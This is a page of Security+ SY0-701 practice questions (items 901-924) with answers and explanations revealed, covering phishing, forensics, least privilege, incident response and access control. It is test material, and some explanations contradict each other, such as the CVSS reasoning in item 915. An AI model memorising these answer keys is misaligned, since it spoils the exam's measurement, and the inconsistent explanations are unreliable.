Security+ SY0-701 (SY0-701) — Questions 901975

1152 questions total · 16pages · All types, answers revealed

Page 12

Page 13 of 16

Page 14
901
Multi-Selecthard

A company stores application passwords in a database that could be stolen during a breach. The team wants to prevent attackers from using precomputed tables and also make identical passwords produce different stored values. Which two changes should be implemented? Select two.

Select 2 answers
A.Use a unique random salt for every password before hashing.
B.Use a slow one-way password hash such as Argon2, bcrypt, or scrypt.
C.Encrypt each password with a single symmetric key and store the key in the database.
D.Add a digital signature to each stored password so users can verify it.
E.Hash all passwords with the same unsalted SHA-256 value.
AnswersA, B

Unique salts defeat rainbow tables and ensure matching passwords do not produce identical outputs.

Why this answer

A unique random salt ensures that even if two users have the same password, their stored hashes differ because the salt is combined with the password before hashing. This prevents attackers from using precomputed rainbow tables, as each salt forces a separate table to be generated. Salting does not slow down the hash itself, but it eliminates the efficiency of precomputed attacks.

Exam trap

The trap here is that candidates often think encryption (Option C) is sufficient for password storage, but encryption with a stored key is reversible and vulnerable if the key is compromised, whereas hashing with a salt is one-way and specifically designed to resist precomputed attacks.

902
MCQeasy

An employee receives an email that appears to be from the CEO and asks for an urgent wire transfer. The sender address is slightly different from the real company address. What is the best first action?

A.Complete the transfer because it came from an executive
B.Reply to the email asking if it is real
C.Verify the request using a separate trusted method
D.Forward it to the whole department for awareness
AnswerC

The safest first action is to verify the request through a separate trusted channel, such as calling the CEO using a known internal number or checking with a supervisor. This helps confirm whether the message is legitimate without relying on the suspicious email itself. Urgent money requests are a common social engineering tactic, so independent verification is essential.

Why this answer

Option C is correct because the email exhibits classic signs of a business email compromise (BEC) attack, where the sender address is spoofed or slightly altered. Verifying the request through a separate, trusted method—such as calling the CEO directly or using a known internal communication channel—bypasses any compromised email system and confirms the legitimacy of the request. This aligns with the principle of out-of-band verification, which is a key defense against phishing and social engineering.

Exam trap

CompTIA often tests the concept that verifying through the same compromised channel (e.g., replying to the email) is insufficient, and the trap here is that candidates may think replying to ask for confirmation is a safe step, when in fact it only engages with the attacker.

How to eliminate wrong answers

Option A is wrong because it assumes the email is legitimate based solely on the display name or role, ignoring the fact that attackers can easily spoof sender addresses and exploit authority to bypass security controls. Option B is wrong because replying to the email sends the response to the attacker-controlled address, confirming the employee's availability and potentially exposing sensitive information; the attacker may also intercept or manipulate the reply. Option D is wrong because forwarding the email to the entire department spreads the phishing attempt, increasing the risk that other employees might fall for the attack or that the malicious content could trigger additional security incidents.

903
MCQmedium

A manager asks the security team to let Human Resources inspect the files on a laptop suspected of containing stolen customer data before IT touches it. What is the best response?

A.Let HR browse the files first so they can confirm whether the data is sensitive.
B.Create a forensic image of the device, document the handoff, and maintain chain of custody before any analysis.
C.Copy the files to a shared drive so multiple departments can review them quickly.
D.Factory reset the laptop immediately to prevent further leakage of customer data.
AnswerB

When a device may contain evidence, the priority is to preserve it in a way that supports later analysis and legal defensibility. Creating a forensic image captures the data without modifying the original device, and documenting each transfer maintains chain of custody. This approach protects evidence integrity and allows authorized investigators to review the copy instead of the live system. It is the correct response before HR or others inspect the contents.

Why this answer

Option B is correct because the first priority in any investigation involving potential evidence is to preserve the data in its original state. Creating a forensic image (bit-for-bit copy) ensures that the original media is not altered, and documenting the handoff with a chain of custody form provides a verifiable audit trail. This process adheres to forensic best practices and legal requirements, preventing spoliation of evidence before any analysis begins.

Exam trap

The trap here is that candidates may think HR needs immediate access to confirm sensitivity, but they overlook the forensic requirement to preserve the original state of the evidence before any access or analysis occurs.

How to eliminate wrong answers

Option A is wrong because allowing HR to browse the files directly on the live laptop would modify metadata (e.g., file access times, last opened dates) and could potentially alter or delete data, compromising the integrity of the evidence. Option C is wrong because copying files to a shared drive without first creating a forensic image risks altering file timestamps and metadata during the copy process, and it bypasses proper chain of custody, making the evidence inadmissible. Option D is wrong because factory resetting the laptop would destroy all data, including any evidence of the alleged theft, making it impossible to conduct a forensic investigation and potentially violating legal hold requirements.

904
MCQeasy

A coworker asks for a spreadsheet containing employee home addresses and personal phone numbers so they can build a team contact list. What is the best response?

A.Share the spreadsheet, because the request is from another employee inside the company.
B.Confirm the requester is authorized and only provide the minimum personal data allowed by policy.
C.Email the full spreadsheet, because internal data is not protected by privacy rules.
D.Delete the spreadsheet immediately so the information cannot be misused.
AnswerB

The best response is to verify authorization and limit the data shared to the minimum needed. Privacy and data-handling rules often restrict personal information such as home addresses and personal phone numbers. Even internal requests should follow approved business purpose, least privilege, and data minimization principles before any disclosure occurs.

Why this answer

Option B is correct because it aligns with the principle of least privilege and data minimization, which are core to security program management. Even internal requests must be verified for authorization, and only the minimum personal data required for the stated purpose should be shared, as per organizational policy and privacy regulations like GDPR or CCPA.

Exam trap

The trap here is that candidates may assume internal requests are automatically safe, ignoring the need for authorization and data minimization, which is a common misconception tested in SY0-701.

How to eliminate wrong answers

Option A is wrong because it assumes that internal employment automatically grants authorization to access sensitive PII, which violates data access control policies. Option C is wrong because internal data, especially PII like home addresses and phone numbers, is protected by privacy rules and regulations; emailing the full spreadsheet without controls exposes the organization to data breach risks. Option D is wrong because deleting the spreadsheet is an overreaction that does not address the legitimate business need and may violate data retention policies; the correct action is to follow policy for authorized access.

905
MCQeasy

A help desk technician needs temporary access to read one shared folder to troubleshoot a printer issue. Which access choice best follows least privilege?

A.Grant the technician full control of the entire file server for one day.
B.Give the technician read-only access to the single shared folder needed for the ticket.
C.Add the technician to the domain admins group until the issue is resolved.
D.Allow the technician to use any account in the department for convenience.
AnswerB

Least privilege means granting only the minimum access needed to complete the task. Read-only access to one specific folder supports troubleshooting without exposing unrelated files or administrative functions.

Why this answer

Option B is correct because it grants the technician only the minimum permissions (read-only) to the specific resource (single shared folder) required to troubleshoot the printer issue. This adheres to the principle of least privilege by limiting access scope and duration, reducing the risk of unauthorized changes or data exposure.

Exam trap

The trap here is that candidates often confuse 'temporary access' with 'elevated privileges' (like Domain Admins) instead of recognizing that the least privilege principle requires the minimal permission (read-only) to the minimal resource (single folder), not broad administrative roles.

How to eliminate wrong answers

Option A is wrong because granting full control of the entire file server provides far more access than needed, violating least privilege and exposing all files to potential accidental modification or deletion. Option C is wrong because adding the technician to the Domain Admins group grants unrestricted administrative access to the entire domain, which is excessive and introduces significant security risk. Option D is wrong because allowing the technician to use any department account bypasses accountability and audit trails, as actions cannot be tied to the specific technician, and may expose credentials or sensitive data.

906
MCQeasy

A help desk technician receives a phone call from someone claiming to be a contractor. The caller says their MFA app was lost, asks the technician to enroll a new device immediately, and pressures them to ignore policy. What type of attack is this?

A.Phishing
B.Vishing
C.Smishing
D.Baiting
AnswerB

Vishing uses voice calls to pressure a target into revealing information or changing security settings.

Why this answer

This is a vishing (voice phishing) attack because the attacker uses a phone call to impersonate a contractor and socially engineer the technician into bypassing MFA enrollment policies. Vishing specifically exploits voice communication to manipulate victims, unlike phishing which uses email or malicious links.

Exam trap

The trap here is confusing vishing with phishing because both involve social engineering, but the key differentiator is the communication medium—voice (phone call) vs. electronic message (email/SMS).

How to eliminate wrong answers

Option A is wrong because phishing involves deceptive emails or messages with malicious links/attachments, not a direct phone call. Option C is wrong because smishing uses SMS text messages to trick victims, not voice calls. Option D is wrong because baiting relies on offering something enticing (e.g., a free USB drive) to lure victims into a trap, not a phone-based social engineering request.

907
MCQhard

Based on the exhibit, what control type is the automated reapplication of the baseline?

A.Preventive control, because the system prevented the user from changing the firewall profile at all.
B.Corrective control, because the MDM agent restores the approved baseline after the unauthorized change is found.
C.Detective control, because the help desk can review the event later.
D.Deterrent control, because the policy baseline discourages users from making changes.
AnswerB

Corrective control is the best answer because the system repairs the deviation after it has already happened. The user altered the firewall profile, and then the management platform reapplied the approved baseline at the next check-in. This restores the device to the desired secure state, which is exactly what a corrective control is designed to do.

Why this answer

The automatic reapplication of the approved firewall baseline is a corrective control because it fixes a configuration that drifted away from the secure standard. The user was able to make the change, so the control was not preventive. The MDM system then returned the device to its approved state, which is the defining behavior of correction rather than simple detection or deterrence.

Why others are wrong: The user change was already allowed to happen, so the control was not preventive. The log shows an automatic restoration, not just an alert, so it is more than detective. A deterrent would merely discourage changes through warnings or visibility. The key evidence is the platform's automatic rollback to the approved baseline after the deviation was found.

908
MCQmedium

A project lead needs to send a spreadsheet labeled confidential to an external auditor. The file contains employee names, salaries, and performance notes. Which handling step best protects the data while still supporting the business need?

A.Email the attachment unencrypted if the auditor signed an NDA
B.Use an approved encrypted file-sharing portal with named recipients and access logging
C.Upload the spreadsheet to a public link so the auditor can access it easily
D.Remove the confidential label before sending it to avoid confusion
AnswerB

Approved encrypted sharing limits access to intended recipients and creates traceability for audit and oversight.

Why this answer

Option B is correct because using an approved encrypted file-sharing portal with named recipients and access logging ensures data-in-transit and data-at-rest encryption, restricts access to only the intended auditor, and provides an audit trail for compliance. This approach meets the business need of securely sharing confidential employee data while supporting regulatory requirements like GDPR or HIPAA, unlike unencrypted email which exposes data to interception.

Exam trap

The trap here is that candidates may think an NDA alone provides sufficient protection, overlooking that encryption and access controls are required to prevent data breaches during transmission and storage.

How to eliminate wrong answers

Option A is wrong because emailing an unencrypted attachment, even with an NDA in place, exposes the data to interception during transit (e.g., via TLS stripping or man-in-the-middle attacks) and does not provide encryption or access controls. Option C is wrong because uploading the spreadsheet to a public link makes the data accessible to anyone with the link, violating confidentiality and lacking authentication or logging. Option D is wrong because removing the confidential label does not change the sensitivity of the data; it merely obscures the classification, leading to potential mishandling and non-compliance with data protection policies.

909
MCQeasy

A security team wants to reduce repeated user mistakes after a phishing campaign without overwhelming employees with long training sessions. Which approach is best?

A.Send a short, targeted reminder to the affected users with a clear reporting path
B.Require every employee to attend a full-day security class immediately
C.Wait until the next annual training cycle and do nothing now
D.Disable email access for all employees until they pass a new test
AnswerA

A short targeted reminder is practical, timely, and focused on the specific behavior that needs improvement.

Why this answer

Option A is correct because it applies targeted, immediate reinforcement to the specific users who made mistakes, using a short reminder that clarifies the reporting path. This approach leverages just-in-time training, which has been shown to improve retention and behavior change without overwhelming employees. It directly addresses the root cause—repeated user errors—by providing a clear, actionable step (e.g., 'Report suspicious emails using the PhishAlarm button') rather than generic awareness.

Exam trap

The trap here is that candidates may choose option B (full-day class) because they overestimate the value of comprehensive training, failing to recognize that targeted, immediate reinforcement is more effective for correcting specific, repeated mistakes without causing training fatigue.

How to eliminate wrong answers

Option B is wrong because a full-day security class is overly time-consuming and likely to cause training fatigue, reducing overall effectiveness and not targeting the specific users who made mistakes. Option C is wrong because waiting until the next annual training cycle leaves the repeated mistakes unaddressed, allowing the same vulnerabilities to persist and potentially lead to a successful breach. Option D is wrong because disabling email access for all employees is a drastic, disruptive measure that punishes the entire workforce, including those who did not make mistakes, and does not provide any educational value or fix the underlying behavior.

910
MCQhard

Based on the exhibit, what is the best handling decision for the requested file?

A.Share the full file by email as Confidential because only the last four digits of the SSN are included.
B.Label it Public because the contractor needs the information to troubleshoot effectively.
C.Mark it Internal and place it on the shared project drive for easy access.
D.Treat it as Restricted, redact unnecessary fields, and provide only the minimum approved dataset through a logged encrypted transfer.
AnswerD

The file contains customer PII, financial information, and case notes, so it should be handled as Restricted rather than merely Confidential. The policy requires minimization, masking where possible, owner approval, time-limited access, and logged sharing. Because the request comes from an external contractor, the organization should provide only the least amount of data needed, with encryption and formal approval.

Why this answer

Option D is correct because the file contains personally identifiable information (PII) in the form of a Social Security Number (SSN), which requires handling under a Restricted classification per most data governance frameworks. The correct procedure is to redact unnecessary fields, such as the full SSN, and transmit only the minimum approved dataset via a logged encrypted transfer (e.g., using SFTP or HTTPS with TLS 1.2+) to ensure confidentiality, integrity, and auditability. This aligns with the principle of least privilege and data minimization, which are core to security program management.

Exam trap

The trap here is that candidates may assume that sharing only the last four digits of an SSN makes the data safe to send via email (Option A), but CompTIA tests that any PII, even partial, requires Restricted handling and encrypted transfer to prevent data breaches and comply with regulations like GDPR or HIPAA.

How to eliminate wrong answers

Option A is wrong because sharing the full file by email, even with only the last four digits of the SSN, violates data minimization and exposes residual PII; email is not an approved secure channel for Restricted data and lacks encryption at rest and in transit guarantees. Option B is wrong because labeling the file Public would allow unrestricted access, which is inappropriate for any data containing SSN fragments; the contractor's need to troubleshoot does not override data classification policies. Option C is wrong because marking the file Internal and placing it on a shared project drive does not provide access controls or encryption sufficient for PII, and it fails to redact unnecessary fields, exposing the full SSN to unauthorized personnel.

911
MCQeasy

A department finished using paper forms that contain customer information, and the retention period has expired. What is the best next step?

A.Store them indefinitely in a cabinet for future reference
B.Dispose of them using approved secure destruction methods
C.Send them to another team without checking the retention schedule
D.Scan them to personal email so the department can keep a copy
AnswerB

Approved secure destruction ensures the expired records cannot be easily recovered or misused later.

Why this answer

Option B is correct because once the retention period has expired, the organization must securely destroy the paper forms to prevent unauthorized access to customer information. Approved secure destruction methods for paper records include cross-cut shredding, incineration, or pulping, which render the data irrecoverable and comply with data protection regulations like GDPR or HIPAA.

Exam trap

The trap here is that candidates may think indefinite storage (A) is acceptable for future reference, but the expired retention period legally requires destruction, not just storage.

How to eliminate wrong answers

Option A is wrong because storing expired records indefinitely violates data minimization principles and retention policies, increasing the risk of data breaches and non-compliance with regulations. Option C is wrong because sending records to another team without verifying the retention schedule could propagate sensitive data beyond its authorized lifecycle, leading to unauthorized access or legal penalties. Option D is wrong because scanning customer information to personal email bypasses organizational controls, creates an unsecured copy, and violates data handling policies, potentially exposing the data to loss or interception.

912
MCQhard

A records application displays a mandatory notice before login that tells employees exactly which data types they may open, when to lock their screens, and that only assigned work may be processed. The notice is meant to shape behavior before misuse occurs, but it does not technically block any action. Which control type is this notice?

A.Directive control
B.Preventive control
C.Deterrent control
D.Detective control
AnswerA

The notice provides required guidance and expectations before users access the system. It tells them what behavior is allowed and how they should act, but it does not enforce the rule technically. That makes it a directive control because it directs user behavior through instructions and stated requirements rather than by blocking actions.

Why this answer

A directive control is designed to guide or mandate behavior through policies, procedures, or notices without enforcing technical restrictions. This notice explicitly tells employees which data types they may open, when to lock screens, and that only assigned work may be processed, shaping behavior before misuse occurs without blocking any action. It aligns with the definition of a directive control as it provides rules and expectations rather than preventing or deterring actions through technical means.

Exam trap

The trap here is that candidates confuse a directive control with a deterrent control because both involve warnings, but a deterrent control explicitly threatens consequences or punishment to discourage action, whereas a directive control simply instructs on proper behavior without implying enforcement or penalties.

How to eliminate wrong answers

Option B is wrong because a preventive control would technically block unauthorized actions, such as using access control lists (ACLs) or file permissions to prevent opening restricted data types, whereas this notice only advises without enforcing any technical barrier. Option C is wrong because a deterrent control aims to discourage misuse through the threat of consequences or penalties, such as warning banners that imply monitoring or disciplinary action, but this notice simply states allowed behaviors without threatening punishment or creating fear of repercussions.

913
MCQmedium

A SIEM alert flags an interactive logon to a Windows file server from a service account that normally only runs scheduled tasks. The alert occurred at 01:12, but the maintenance window for that server is every Sunday at 02:00. The account also accessed a different server five minutes later. What should the analyst do first?

A.Ignore the alert because service accounts often authenticate outside normal business hours.
B.Correlate the activity with the change calendar, scheduled-task logs, and ticketing records before escalating.
C.Immediately disable the service account to stop any potential attacker activity.
D.Reimage the file server to remove any possible compromise.
AnswerB

The best first step in triage is to determine whether the activity is authorized or anomalous. Because service-account use can be legitimate, the analyst should correlate the logon with maintenance windows, scheduled-task history, and approved change records. That quickly separates normal administrative activity from suspicious lateral movement without prematurely disrupting operations.

Why this answer

Option B is correct because the analyst must first gather context to determine if the alert is a false positive or a genuine security incident. The interactive logon at 01:12 is outside the scheduled maintenance window (Sunday 02:00), and the account’s subsequent access to another server warrants correlation with change calendars, scheduled-task logs, and ticketing records to verify if the activity was authorized. This step prevents unnecessary disruption while ensuring that any anomalous behavior is properly investigated before escalation.

Exam trap

The trap here is that candidates may assume any activity outside business hours is automatically malicious or, conversely, that service accounts always authenticate at odd hours, leading them to ignore the alert—when the key is to recognize that the interactive logon type and the deviation from the maintenance window are the specific anomalies requiring correlation.

How to eliminate wrong answers

Option A is wrong because ignoring the alert based solely on the time of day overlooks the specific anomaly: the account performed an interactive logon (type 2 or 10) rather than its usual scheduled-task logon (type 5), and the activity occurred outside the defined maintenance window. Option C is wrong because immediately disabling the service account without investigation could disrupt legitimate operations and destroy forensic evidence; the analyst should first verify if the activity was authorized via change records. Option D is wrong because reimaging the server is a drastic, irreversible step that should only be taken after confirming compromise through proper forensic analysis and incident response procedures.

914
Multi-Selecthard

A company distributes update packages through a web portal. Users must verify the portal's identity over the network, and the downloaded packages must be trusted even if the web server is later compromised. Which two controls best satisfy these goals? Select two.

Select 2 answers
A.Use HTTPS with a certificate from a trusted certificate authority so users can validate the portal.
B.Use FTP over the internet because the credentialed login keeps the transfer secure enough.
C.Digitally sign the update packages so clients can verify integrity even if the web server is later compromised.
D.Publish a SHA-256 hash on the same download page and trust that the server will remain honest.
E.Use plain HTTP and rely on file permissions to protect the updates in transit.
AnswersA, C

HTTPS protects the connection in transit and lets clients validate that they are communicating with the expected portal through trusted certificate chains. That addresses the need to confirm the portal's identity over the network and prevents interception or modification by an attacker on the path.

Why this answer

HTTPS with a certificate from a trusted certificate authority (CA) allows the client to validate the web portal's identity by verifying the certificate's chain of trust and ensuring the domain name matches. This prevents man-in-the-middle attacks and confirms the server is legitimate before any data is exchanged.

Exam trap

The trap here is that candidates may think FTP with credentials is sufficient for identity verification, but FTP does not provide certificate-based server authentication, and the question specifically requires verifying the portal's identity over the network, which only HTTPS with a trusted CA certificate achieves.

915
MCQhard

Based on the exhibit, which finding should be remediated first?

A.Finding A
B.Finding B
C.Finding C
D.Finding D
AnswerA

Finding A combines internet exposure, remote code execution, and active exploitation in the wild, making it the most urgent risk even if another item has a slightly higher CVSS score. Exposure and exploitability matter more than score alone. A patch is available, so remediation can reduce the window of opportunity quickly. In Security+ style prioritization, reachable, actively exploited weaknesses on public-facing systems rise to the top.

Why this answer

Finding A indicates a critical vulnerability with a CVSS score of 9.8, which is the highest severity among the findings. Remediation should prioritize the most severe risk to minimize potential impact, as this vulnerability could allow remote code execution without authentication.

Exam trap

The trap here is that candidates might choose a finding based on the number of affected systems or a misleading description, rather than strictly prioritizing by CVSS severity score as CompTIA expects.

How to eliminate wrong answers

Option B is wrong because its CVSS score of 7.5 is lower than Finding A's 9.8, and while it represents a high-severity issue, it does not pose the same immediate risk of unauthenticated remote compromise. Option C is wrong because it has a CVSS score of 6.2, which is medium severity, and typically involves a local attack vector or requires user interaction, making it less urgent than a critical remote exploit. Option D is wrong because its CVSS score of 4.3 is low severity, often related to information disclosure or minor misconfigurations, and should be addressed after critical and high-severity findings.

916
MCQeasy

A vendor says a patch for a critical flaw in a public-facing application will not be available for 30 days, but the service must stay online. What is the best short-term risk treatment?

A.Accept the risk without making any changes because the patch is not available yet.
B.Avoid the risk by permanently shutting down the application.
C.Transfer the risk to an insurance policy and wait for the patch.
D.Implement compensating controls, such as tighter filtering and temporary restrictions, until the patch is released.
AnswerD

This is the best option because the business must keep the application online, but the known vulnerability still needs risk reduction. Compensating controls are temporary safeguards that lower exposure when a permanent fix is unavailable. Examples include stricter access filtering, disabling unnecessary features, or adding monitoring until the vendor patch can be applied safely.

Why this answer

Option D is correct because when a critical patch is unavailable, the best short-term risk treatment is to implement compensating controls that reduce the likelihood or impact of exploitation. For a public-facing application, this could include deploying a web application firewall (WAF) with tighter rule sets, rate limiting, IP allowlisting, or temporarily disabling non-essential functionality. These controls provide a defense-in-depth layer until the vendor releases the patch, keeping the service online while reducing risk.

Exam trap

CompTIA often tests the misconception that risk acceptance is a valid short-term treatment when a patch is delayed, but the key is that acceptance is only appropriate after evaluating and documenting the risk, not as a default action without controls.

How to eliminate wrong answers

Option A is wrong because accepting the risk without any changes leaves the application fully exposed to a known critical flaw, which is irresponsible and could lead to a breach. Option B is wrong because permanently shutting down the application avoids the risk but disrupts business operations entirely, which is not a short-term treatment and fails the requirement that the service must stay online. Option C is wrong because transferring the risk to an insurance policy does not reduce the technical exposure; insurance covers financial loss after an incident but does not prevent exploitation of the vulnerability.

917
MCQeasy

During a tabletop exercise, the team realizes no one has a list of who to notify if the online ordering system goes down. Which continuity planning element is missing?

A.Data retention schedule, because it defines how long records are kept.
B.Communication plan, because it defines who must be contacted and how.
C.Asset inventory, because it lists all hardware and software in use.
D.Network segmentation, because it separates sensitive systems from user networks.
AnswerB

A communication plan identifies the people, groups, and channels used during an outage or incident. If no one knows who to notify, the organization lacks a key continuity component that supports coordinated response and stakeholder awareness.

Why this answer

A communication plan is the missing continuity planning element because it specifically defines the stakeholders who must be notified during an outage (e.g., internal teams, vendors, customers) and the methods of contact (e.g., email, SMS, phone tree). Without this plan, the team cannot execute the notification procedures required by the business continuity plan (BCP) to coordinate response and recovery efforts for the online ordering system.

Exam trap

The trap here is that candidates confuse an asset inventory (which lists what you have) with a communication plan (which lists who to call), leading them to pick Option C because they think knowing the system's hardware is necessary for notification, but the question specifically asks about 'who to notify,' not 'what is affected.'

How to eliminate wrong answers

Option A is wrong because a data retention schedule governs how long records are kept (e.g., 90 days for transaction logs per PCI DSS), not who to notify during an outage. Option C is wrong because an asset inventory lists hardware and software (e.g., server models, OS versions) but does not define notification contacts or escalation paths. Option D is wrong because network segmentation (e.g., VLANs, firewall zones) isolates sensitive systems for security, but it does not address the operational need to contact personnel when a system fails.

918
Multi-Selectmedium

An organization is implementing a new Security Information and Event Management (SIEM) system. Which three of the following are primary capabilities that a SIEM provides to support security operations? (Choose three.)

Select 3 answers
.Correlation of log data from multiple sources to identify patterns of suspicious activity
.Real-time alerting based on predefined security rules and anomalies
.Long-term storage and retention of logs for compliance and forensic analysis
.Automated patching of operating system vulnerabilities across the enterprise
.Blocking malicious network traffic at the perimeter firewall
.Performing vulnerability scans on internal hosts and applications

Why this answer

A SIEM system's primary capabilities include aggregating and correlating log data from diverse sources (servers, firewalls, endpoints) to detect patterns indicative of security incidents. It provides real-time alerting by applying predefined correlation rules and anomaly detection algorithms to streaming log events. Additionally, SIEM solutions offer long-term log storage and retention, which is essential for compliance audits (e.g., PCI DSS, HIPAA) and post-incident forensic analysis.

Exam trap

The trap here is that candidates confuse a SIEM's ability to ingest and analyze data from other security tools with the ability to perform those tools' native functions (like patching, blocking, or scanning), leading them to select options that describe actions a SIEM cannot directly execute.

919
MCQmedium

A file server in the accounting department begins renaming documents and dropping ransom notes. The SOC confirms encryption is still in progress, and the server hosts a share used by several finance teams. What should the incident response team do first?

A.Disconnect the server from the network to contain the spread.
B.Restore the file share from backup immediately while the server is still connected.
C.Power off the server immediately without any other action.
D.Notify users to change their passwords before any technical action is taken.
AnswerA

Immediate network isolation stops further encryption, reduces lateral movement, and protects other systems. In ransomware events, containment is the first priority once the incident is confirmed and active.

Why this answer

Disconnecting the server from the network is the immediate containment step to prevent the ransomware from encrypting additional files on the share or spreading laterally to other systems. Since encryption is still in progress, isolating the server stops the attacker's process from accessing more files and blocks any command-and-control (C2) communication. This aligns with the NIST incident response framework's containment phase, prioritizing stopping the spread over recovery or notification.

Exam trap

The trap here is that candidates may prioritize data recovery (Option B) or user notification (Option D) over containment, failing to recognize that the immediate priority is stopping active encryption to limit damage.

How to eliminate wrong answers

Option B is wrong because restoring from backup while the server is still connected risks re-encrypting the restored files if the ransomware process is active, and it violates the containment-first principle. Option C is wrong because powering off the server may cause loss of volatile forensic data (e.g., memory-resident encryption keys, running processes) and can trigger anti-forensic behaviors in some ransomware strains. Option D is wrong because notifying users to change passwords before technical containment wastes critical time; the immediate threat is active encryption, not credential compromise, and password changes should occur after containment and eradication.

920
Multi-Selecthard

A post-incident review shows the SOC detected malicious PowerShell activity six hours late because the existing detections did not correlate the encoded command, the unusual outbound connection, and the creation of a scheduled task. Leadership wants the two follow-up actions most likely to improve future response. Select two.

Select 2 answers
A.Add the new indicators and event patterns to SIEM and EDR detections.
B.Revise the incident response playbook so analysts know the new escalation and containment steps.
C.Restore the compromised host to production immediately after the next reboot.
D.Reduce log retention to keep storage costs low.
E.Disable PowerShell everywhere without reviewing business requirements or alternatives.
AnswersA, B

Updating detections helps the security stack recognize the same behavior earlier in the future.

Why this answer

Option A is correct because adding the new indicators (encoded command, unusual outbound connection, scheduled task creation) and event patterns to SIEM and EDR detections directly addresses the root cause of the six-hour delay: the lack of correlation between these specific events. By updating detection rules to correlate these patterns, the SOC can trigger alerts in near-real time rather than relying on manual post-hoc analysis. This is a core SIEM/EDR tuning practice to reduce mean time to detect (MTTD).

Exam trap

The trap here is that candidates may think updating the playbook (Option B) is the primary fix, but the question specifically asks for actions that improve future *detection* and *response* speed, and while playbook revision helps, the root cause was missing detection logic, not missing procedural steps.

921
MCQmedium

EDR flags encoded PowerShell launched by a spreadsheet application, followed by an attempt to access LSASS and outbound HTTPS traffic to a rare domain. What should the analyst do first from the EDR console?

A.Reboot the endpoint to terminate the suspicious processes
B.Isolate the endpoint from the network while keeping it powered on
C.Uninstall the spreadsheet application immediately
D.Block the rare domain and close the alert
AnswerB

Isolation stops further communication and lateral movement while preserving evidence on a live system.

Why this answer

Option B is correct because isolating the endpoint from the network while keeping it powered on preserves volatile evidence (e.g., running processes, memory contents) and prevents the attacker from exfiltrating data or establishing further C2 communication. The EDR console allows immediate network isolation without losing the ability to perform live forensics or memory analysis. This aligns with the incident response priority of containment before eradication or recovery.

Exam trap

The trap here is that candidates confuse immediate containment (isolation) with eradication (reboot or uninstall), failing to recognize that preserving volatile evidence is critical for understanding the attack vector and scope before taking destructive actions.

How to eliminate wrong answers

Option A is wrong because rebooting the endpoint destroys volatile evidence in memory (e.g., LSASS dump artifacts, injected code) and may allow persistence mechanisms to re-execute on startup, potentially losing the forensic trail. Option C is wrong because uninstalling the spreadsheet application is a premature remediation step that destroys evidence and does not address the active threat; the analyst must first contain the endpoint to prevent lateral movement or data exfiltration.

922
MCQmedium

Employees must sign in to several SaaS applications with corporate credentials, and terminated users should lose access quickly without manual changes in each app. Which solution best meets the requirement?

A.Create separate local usernames and passwords in each SaaS application.
B.Use federation for sign-on and automated provisioning and deprovisioning through an identity lifecycle process.
C.Require users to share one department password for each SaaS platform.
D.Store the same password in every application vault and sync it nightly.
AnswerB

Federation allows users to authenticate with the corporate identity provider, while automated provisioning helps create, update, and disable accounts across connected SaaS apps. This design supports single sign-on, faster offboarding, and centralized control over access lifecycle changes. It also reduces the risk of forgotten orphaned accounts remaining active after termination.

Why this answer

Federation enables single sign-on (SSO) using standards like SAML 2.0 or OIDC, allowing users to authenticate once with corporate credentials across multiple SaaS apps. Automated provisioning and deprovisioning via SCIM (System for Cross-domain Identity Management) ensures that when an employee is terminated, their access is revoked from all connected applications instantly without manual intervention, meeting the requirement for rapid access removal.

Exam trap

The trap here is that candidates may confuse federation with simple SSO, overlooking the automated provisioning/deprovisioning component that is essential for the 'lose access quickly' requirement, and instead pick a password-vaulting solution thinking it centralizes credentials.

How to eliminate wrong answers

Option A is wrong because creating separate local usernames and passwords in each SaaS app requires manual management for each account, making it impossible to quickly revoke access for terminated users across all apps without individual changes. Option C is wrong because sharing one department password violates the principle of least privilege and non-repudiation, as it prevents individual accountability and does not allow targeted revocation for a single terminated user. Option D is wrong because storing the same password in every application vault and syncing it nightly does not provide immediate access revocation; a terminated user could still authenticate until the next sync, and password reuse across apps increases security risk if one vault is compromised.

923
MCQeasy

After an employee successfully signs in to a file-sharing portal, the portal checks whether the employee can upload files to a specific project folder. Which AAA concept is being used?

A.Authentication, because the user proved their identity with credentials.
B.Authorization, because the system is deciding what the signed-in user is allowed to do.
C.Accounting, because the portal is recording the folder permissions for later review.
D.Nonrepudiation, because the portal proves the user cannot deny uploading a file.
AnswerB

Authorization is the process of determining permissions after identity has been confirmed. In this case, the portal is checking whether the authenticated user may upload files to a particular folder. That is a classic authorization decision because it controls access to a resource based on assigned rights, roles, or group membership.

Why this answer

After the user successfully signs in (authentication), the portal checks permissions to determine if they can upload files to a specific project folder. This is the definition of authorization: verifying what an authenticated user is allowed to do. The system is enforcing access control based on the user's identity and the folder's permissions.

Exam trap

The trap here is that candidates confuse the initial login (authentication) with the subsequent permission check (authorization), often selecting 'Authentication' because they see 'signs in' and assume the entire process is about identity verification.

How to eliminate wrong answers

Option A is wrong because authentication is the process of verifying identity (e.g., with a password or MFA), which has already occurred before the portal checks upload permissions; the question describes a post-login permission check, not identity verification. Option C is wrong because accounting involves logging and tracking user activities (e.g., upload events, timestamps) for auditing or billing, not checking permissions against a folder. Option D is wrong because nonrepudiation ensures a user cannot deny an action (e.g., via digital signatures or audit logs), but the scenario is about a pre-action permission check, not proving an action occurred.

924
MCQmedium

A payroll application allows the same user to create a vendor and approve a payment. The security team wants to reduce fraud without adding unnecessary complexity. Which principle should they apply?

A.Separation of duties, so no single person can complete the entire high-risk workflow.
B.Job rotation, so employees periodically switch responsibilities to learn each other’s tasks.
C.Defense in depth, so multiple technical tools inspect every payment form.
D.Least privilege, so the payroll user can create and approve only this one vendor payment.
AnswerA

Separation of duties is the best control when one person should not be able to create and approve the same payment. By splitting responsibilities across different roles or approvals, the organization reduces the chance of fraud, abuse, or accidental misuse. This principle is common in finance and payroll workflows because it provides meaningful risk reduction without requiring a complicated technical redesign of the entire application.

Why this answer

Separation of duties (option A) is the correct principle because it prevents a single user from both creating a vendor and approving a payment, which would allow that user to commit fraud by setting up a fake vendor and authorizing a payment to it. By splitting these high-risk tasks between two or more people, the organization enforces a dual-control mechanism that reduces the risk of internal fraud without adding complex technical controls. This aligns with the security team's goal of reducing fraud while avoiding unnecessary complexity.

Exam trap

The trap here is that candidates often confuse separation of duties with job rotation or defense in depth, mistakenly thinking that rotating employees or adding more technical controls will prevent internal fraud, when in fact only splitting conflicting responsibilities directly addresses the risk of a single user completing a high-risk workflow.

How to eliminate wrong answers

